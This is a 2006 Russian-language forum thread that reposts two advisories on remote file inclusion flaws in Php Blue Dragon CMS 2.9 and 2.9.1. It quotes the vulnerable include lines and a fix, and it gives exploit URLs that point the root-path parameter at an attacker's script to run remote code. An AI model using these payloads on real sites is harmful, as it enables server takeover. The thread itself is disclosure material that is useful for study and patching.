Уязвимости: Php Blue Dragon СMS

Ŧ1LAN · 15.05.2006

Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability

Код:

// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);

Fix:

Код:

// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Код:

http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]

Видео:
с рапиды
:zns5:

Скачать|Download
с мегаплода
:zns5:

Скачать|Download
приятного просмотра и прослушивания(dj-spookY => b-side most wanted) =)

Ŧ1LAN · 15.06.2006

PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability
Описание:
Ошибка существует в template.php, line 23:

Код:

---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---

Пример/Эксплоит:

Код:

http://examplе/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/

[GL] · 16.06.2006

Ŧ1LAN
кто автор этих адвизорс?

Ŧ1LAN · 17.06.2006

[GL]
1)

Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
DEVIL TEAM THE BEST POLISH TEAM

2)

PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability
Federico Fazzi

Pwlogin · 18.06.2006

Хорошее видео

Спасибо. Порадовала озвучка.
[GL]
А зачем тебе авторы этих адвизорс

Уязвимости: Php Blue Dragon СMS

Ŧ1LAN

CPU register

Ŧ1LAN

CPU register

[GL]

RAID-массив

Ŧ1LAN

CPU register

Pwlogin

CD-диск